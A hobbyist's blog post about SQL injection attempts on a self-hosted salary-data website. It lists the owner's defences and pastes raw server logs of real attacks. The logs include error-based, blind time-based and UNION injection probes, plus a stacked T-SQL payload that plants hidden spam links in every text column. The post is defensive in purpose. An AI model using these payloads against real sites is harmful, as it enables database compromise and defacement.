SQL Injection attack on Website hosted on EC2 Machine

SQL Injection attack on Website hosted on EC2 Machine:

I setup a website http://h1bsalary.online with publicly available dataset. As soon as I launched website, numerous trolls and automated bots sending traffic to identify the vulnerabilities.

Safe-Guards I have taken so far :

    1. Provisioned Least privileged accounts to access the database 
    1. Implemented Sanitization of Input parameters
    1. All data retrieval operations are done through Stored procedures.
    1. All the database ports ( Both MySQL and SQL Server ) is blocked and explicit permissions are granted to  whitelisted IP’s.
    1. These are preliminary steps I look to safeguard. Without proper Intrusion Prevention and Intrusion Detection System, its very hard to safeguard website against malicious attacks.
  1. In future  I am planning on Integrating with AWS IPS and IDS System.

https://aws.amazon.com/mp/scenarios/security/ids/

If you are like me, cost conscious and running something from AWS as hobby, its absolutely critical to take care of the security.

Using stored procedures and not doing Dynamic SQL prevents majority of the SQL Injections and it should be absolute minimum to follow .

client: 160.153.153.29, 
server: h1bsalary.online, 
request: "GET /index.php?searchtext=LANE%20COUNTY%20SCHOOL%20DISTRICT%204J%27%20or%20(1,2)
=(select*from(select%20name_const(CHAR(111,108,111,108,111,115,104,101,114),1),
name_const(CHAR(111,108,111,108,111,115,104,101,114),1))a)%20--%20%27x%27=%27x 
HTTP/1.1"

Stored Procedure Call

EXEC SP 'LANE COUNTY SCHOOL DISTRICT 4J or 
(1,2)=(select*from(select name_const(CHAR(111,108,111,108,111,115,104,101,114),1),name_const(CHAR(111,108,111,108,111,115,104,101,114),1))a)
 -- and 1=1' ,''

I Also modified my nginx configuration to block this particular IP

        listen       80;
        server_name  h1bsalary.online;
        location / {
        deny    160.153.153.29 ;
        root /rootfolderlocation;
        index  index.html index.htm index.php;
        }

SQL Inject Calls from Log:

  1 /Technology/blog.php?title=DeadLock%20Event%20Notification');declare%[email protected]%20cursor;declare%[email protected]%20varchar(4000);set%[email protected]=cursor%20for%20select%20'update%20%5B'%2BTABLE_NAME%2B'%5D%20set%20%5B'%2BCOLUMN_NAME%2B'%5D=%5B'%2BCOLUMN_NAME%2B'%5D%2Bcase%20ABS(CHECKSUM(NewId()))%2510%20when%200%20then%20''''%2Bchar(60)%2B''div%20style=%22display:none%22''%2Bchar(62)%2B''perilax%20quiz%20''%2Bchar(60)%2B''a%20href=%22http:''%2Bchar(47)%2Bchar(47)%2B''zholdbarhed.site''%2Bchar(47)%2B''perilax-holdbarhed.cgi%22''%2Bchar(62)%2Bcase%20ABS(CHECKSUM(NewId()))%253%20when%200%20then%20''zholdbarhed.site''%20when%201%20then%20''perilax%20obat''%20else%20''perilax%20suppositorier''%20end%20%2Bchar(60)%2Bchar(47)%2B''a''%2Bchar(62)%2B''%20perilax%2010%20mg''%2Bchar(60)%2Bchar(47)%2B''div''%2Bchar(62)%2B''''%20else%20''''%20end'%20FROM%20sysindexes%20AS%20i%20INNER%20JOIN%20sysobjects%20AS%20o%20ON%20i.id=o.id%20INNER%20JOIN%20INFORMATION_SCHEMA.COLUMNS%20ON%20o.NAME=TABLE_NAME%20WHERE(indid=0%20or%20indid=1)%20and%20DATA_TYPE%20like%20'%25varchar'%20and(CHARACTER_MAXIMUM_LENGTH=-1%20or%20CHARACTER_MAXIMUM_LENGTH=2147483647);open%[email protected];fetch%20next%20from%[email protected]%20into%[email protected];while%[email protected]@FETCH_STATUS=0%20begin%20exec%20(@d);fetch%20next%20from%[email protected]%20into%[email protected];end;close%[email protected]&ID=382
  1 /Technology/blog.php?title=DeadLock%20Event%20Notification';declare%[email protected]%20cursor;declare%[email protected]%20varchar(4000);set%[email protected]=cursor%20for%20select%20'update%20%5B'%2BTABLE_NAME%2B'%5D%20set%20%5B'%2BCOLUMN_NAME%2B'%5D=%5B'%2BCOLUMN_NAME%2B'%5D%2Bcase%20ABS(CHECKSUM(NewId()))%2510%20when%200%20then%20''''%2Bchar(60)%2B''div%20style=%22display:none%22''%2Bchar(62)%2B''perilax%20quiz%20''%2Bchar(60)%2B''a%20href=%22http:''%2Bchar(47)%2Bchar(47)%2B''zholdbarhed.site''%2Bchar(47)%2B''perilax-holdbarhed.cgi%22''%2Bchar(62)%2Bcase%20ABS(CHECKSUM(NewId()))%253%20when%200%20then%20''zholdbarhed.site''%20when%201%20then%20''perilax%20obat''%20else%20''perilax%20suppositorier''%20end%20%2Bchar(60)%2Bchar(47)%2B''a''%2Bchar(62)%2B''%20perilax%2010%20mg''%2Bchar(60)%2Bchar(47)%2B''div''%2Bchar(62)%2B''''%20else%20''''%20end'%20FROM%20sysindexes%20AS%20i%20INNER%20JOIN%20sysobjects%20AS%20o%20ON%20i.id=o.id%20INNER%20JOIN%20INFORMATION_SCHEMA.COLUMNS%20ON%20o.NAME=TABLE_NAME%20WHERE(indid=0%20or%20indid=1)%20and%20DATA_TYPE%20like%20'%25varchar'%20and(CHARACTER_MAXIMUM_LENGTH=-1%20or%20CHARACTER_MAXIMUM_LENGTH=2147483647);open%[email protected];fetch%20next%20from%[email protected]%20into%[email protected];while%[email protected]@FETCH_STATUS=0%20begin%20exec%20(@d);fetch%20next%20from%[email protected]%20into%[email protected];end;close%[email protected]&ID=382
  1 /Technology/blog.php?title=DeadLock%20Event%20Notification;declare%[email protected]%20cursor;declare%[email protected]%20varchar(4000);set%[email protected]=cursor%20for%20select%20'update%20%5B'%2BTABLE_NAME%2B'%5D%20set%20%5B'%2BCOLUMN_NAME%2B'%5D=%5B'%2BCOLUMN_NAME%2B'%5D%2Bcase%20ABS(CHECKSUM(NewId()))%2510%20when%200%20then%20''''%2Bchar(60)%2B''div%20style=%22display:none%22''%2Bchar(62)%2B''perilax%20quiz%20''%2Bchar(60)%2B''a%20href=%22http:''%2Bchar(47)%2Bchar(47)%2B''zholdbarhed.site''%2Bchar(47)%2B''perilax-holdbarhed.cgi%22''%2Bchar(62)%2Bcase%20ABS(CHECKSUM(NewId()))%253%20when%200%20then%20''zholdbarhed.site''%20when%201%20then%20''perilax%20obat''%20else%20''perilax%20suppositorier''%20end%20%2Bchar(60)%2Bchar(47)%2B''a''%2Bchar(62)%2B''%20perilax%2010%20mg''%2Bchar(60)%2Bchar(47)%2B''div''%2Bchar(62)%2B''''%20else%20''''%20end'%20FROM%20sysindexes%20AS%20i%20INNER%20JOIN%20sysobjects%20AS%20o%20ON%20i.id=o.id%20INNER%20JOIN%20INFORMATION_SCHEMA.COLUMNS%20ON%20o.NAME=TABLE_NAME%20WHERE(indid=0%20or%20indid=1)%20and%20DATA_TYPE%20like%20'%25varchar'%20and(CHARACTER_MAXIMUM_LENGTH=-1%20or%20CHARACTER_MAXIMUM_LENGTH=2147483647);open%[email protected];fetch%20next%20from%[email protected]%20into%[email protected];while%[email protected]@FETCH_STATUS=0%20begin%20exec%20(@d);fetch%20next%20from%[email protected]%20into%[email protected];end;close%[email protected]&ID=382


Additional Attack Vectors from Site Hosted on Digital Ocean :

"2019-03-09T16:11:07Z","198.199.102.31 - - [09/Mar/2019:08:09:21 -0800] ""GET /extended_perm_data.php?PermID=2003041'\x22 HTTP/1.1"" 200 6571 ""-"" ""-""""2019-03-09T16:11:07Z","198.199.102.31 - - [09/Mar/2019:08:09:22 -0800] ""GET /extended_perm_data.php?PermID=2003041 HTTP/1.1"" 200 72335 ""-"" ""-""""2019-03-09T16:11:07Z","198.199.102.31 - - [09/Mar/2019:08:09:22 -0800] ""GET /extended_perm_data.php?PermID=20030412121121121212.1 HTTP/1.1"" 200 6571 ""-"" ""-""""2019-03-09T16:11:07Z","198.199.102.31 - - [09/Mar/2019:08:09:22 -0800] ""GET /extended_perm_data.php?PermID=2003041%20and%201%3D1 HTTP/1.1"" 200 6571 ""-"" ""-""""2019-03-09T16:11:07Z","198.199.102.31 - - [09/Mar/2019:08:09:22 -0800] ""GET /extended_perm_data.php?PermID=2003041%20and%201%3E1 HTTP/1.1"" 200 6571 ""-"" ""-""""2019-03-09T16:11:07Z","198.199.102.31 - - [09/Mar/2019:08:09:23 -0800] ""GET /extended_perm_data.php?PermID=2003041%27%20and%20%27x%27%3D%27x HTTP/1.1"" 200 6571 ""-"" ""-""""2019-03-09T16:11:07Z","198.199.102.31 - - [09/Mar/2019:08:09:23 -0800] ""GET /extended_perm_data.php?PermID=2003041%27%20and%20%27x%27%3D%27y HTTP/1.1"" 200 6571 ""-"" ""-""""2019-03-09T16:11:07Z","198.199.102.31 - - [09/Mar/2019:08:09:23 -0800] ""GET /extended_perm_data.php?PermID=2003041\x22%20and%20\x22x\x22%3D\x22x HTTP/1.1"" 200 6571 ""-"" ""-""""2019-03-09T16:11:07Z","198.199.102.31 - - [09/Mar/2019:08:09:23 -0800] ""GET /extended_perm_data.php?PermID=2003041%22%20and%20%22x%22%3D%22y HTTP/1.1"" 200 6571 ""-"" ""-""""2019-03-09T16:11:07Z","198.199.102.31 - - [09/Mar/2019:08:09:23 -0800] ""GET /extended_perm_data.php?PermID=2003041%20AND%201=1 HTTP/1.1"" 200 6571 ""-"" ""-""""2019-03-09T16:11:07Z","198.199.102.31 - - [09/Mar/2019:08:09:24 -0800] ""GET /extended_perm_data.php?PermID=2003041 HTTP/1.0"" 200 72274 ""-"" ""Opera/9.27""""2019-03-09T16:11:07Z","198.199.102.31 - - [09/Mar/2019:08:09:24 -0800] ""GET /extended_perm_data.php?PermID=2003041%27%20AnD%20sLeep%283%29%20ANd%20%270%27%3D%270 HTTP/1.0"" 200 6558 ""-"" ""Opera/9.27""""2019-03-09T16:11:07Z","198.199.102.31 - - [09/Mar/2019:08:09:24 -0800] ""GET /extended_perm_data.php?PermID=2003041%26%26SlEEp%283%29 HTTP/1.0"" 200 6558 ""-"" ""Opera/9.27""""2019-03-09T16:11:07Z","198.199.102.31 - - [09/Mar/2019:08:09:24 -0800] ""GET /extended_perm_data.php?PermID=2003041%27%20AnD%20sLeep%283%29%20ANd%20%271 HTTP/1.0"" 200 6558 ""-"" ""Opera/9.27""""2019-03-09T16:11:07Z","198.199.102.31 - - [09/Mar/2019:08:09:24 -0800] ""GET /extended_perm_data.php?PermID=2003041%27%26%26sLEEp%283%29%26%26%271 HTTP/1.0"" 200 6558 ""-"" ""Opera/9.27""""2019-03-09T16:11:07Z","198.199.102.31 - - [09/Mar/2019:08:09:24 -0800] ""GET /extended_perm_data.php?PermID=2003041%00%27%7C%7CSLeeP%283%29%26%26%271 HTTP/1.0"" 200 6558 ""-"" ""Opera/9.27""""2019-03-09T16:11:07Z","198.199.102.31 - - [09/Mar/2019:08:09:24 -0800] ""GET /extended_perm_data.php?PermID=2003041%20AnD%20BeNChMaRK%282999999%2CMD5%28NOW%28%29%29%29 HTTP/1.0"" 200 6558 ""-"" ""Opera/9.27""""2019-03-09T16:11:07Z","198.199.102.31 - - [09/Mar/2019:08:09:25 -0800] ""GET /extended_perm_data.php?PermID=2003041%26%26BeNChMaRK%282999999%2CMD5%28NOW%28%29%29%29 HTTP/1.0"" 200 6558 ""-"" ""Opera/9.27""""2019-03-09T16:11:07Z","198.199.102.31 - - [09/Mar/2019:08:09:25 -0800] ""GET /extended_perm_data.php?PermID=2003041%27%20aND%20BeNChMaRK%282999999%2CMd5%28NoW%28%29%29%29%20AnD%20%271 HTTP/1.0"" 200 6558 ""-"" ""Opera/9.27""""2019-03-09T16:11:07Z","198.199.102.31 - - [09/Mar/2019:08:09:25 -0800] ""GET /extended_perm_data.php?PermID=2003041%27%26%26BeNChMaRK%282999999%2CmD5%28NOW%28%29%29%29%26%26%271 HTTP/1.0"" 200 6558 ""-"" ""Opera/9.27""""2019-03-09T16:11:07Z","198.199.102.31 - - [09/Mar/2019:08:09:25 -0800] ""GET /extended_perm_data.php?PermID=2003041999999.1%20union%20select%20unhex(hex(version()))%20--%20and%201%3D1 HTTP/1.1"" 200 6571 ""-"" ""-""""2019-03-09T16:11:07Z","198.199.102.31 - - [09/Mar/2019:08:09:25 -0800] ""GET /extended_perm_data.php?PermID=200304199999%27%20union%20select%20unhex(hex(version()))%20--%20%27x%27=%27x HTTP/1.1"" 200 6571 ""-"" ""-""""2019-03-09T16:11:07Z","198.199.102.31 - - [09/Mar/2019:08:09:25 -0800] ""GET /extended_perm_data.php?PermID=200304199999%22%20union%20select%20unhex(hex(version()))%20--%20%22x%22=%22x HTTP/1.1"" 200 6571 ""-"" ""-""""2019-03-09T16:11:07Z","198.199.102.31 - - [09/Mar/2019:08:09:25 -0800] ""GET /extended_perm_data.php?PermID=2003041%20or%20(1,2)=(select*from(select%20name_const(CHAR(111,108,111,108,111,115,104,101,114),1),name_const(CHAR(111,108,111,108,111,115,104,101,114),1))a)%20--%20and%201%3D1 HTTP/1.1"" 200 6571 ""-"" ""-""""2019-03-09T16:11:07Z","198.199.102.31 - - [09/Mar/2019:08:09:25 -0800] ""GET /extended_perm_data.php?PermID=2003041%27%20or%20(1,2)=(select*from(select%20name_const(CHAR(111,108,111,108,111,115,104,101,114),1),name_const(CHAR(111,108,111,108,111,115,104,101,114),1))a)%20--%20%27x%27=%27x HTTP/1.1"" 200 6571 ""-"" ""-""""2019-03-09T16:11:07Z","198.199.102.31 - - [09/Mar/2019:08:09:26 -0800] ""GET /extended_perm_data.php?PermID=2003041%22%20or%20(1,2)=(select*from(select%20name_const(CHAR(111,108,111,108,111,115,104,101,114),1),name_const(CHAR(111,108,111,108,111,115,104,101,114),1))a)%20--%20%22x%22=%22x HTTP/1.1"" 200 6571 ""-"" ""-"""

Leave a Reply

Your email address will not be published. Required fields are marked *

*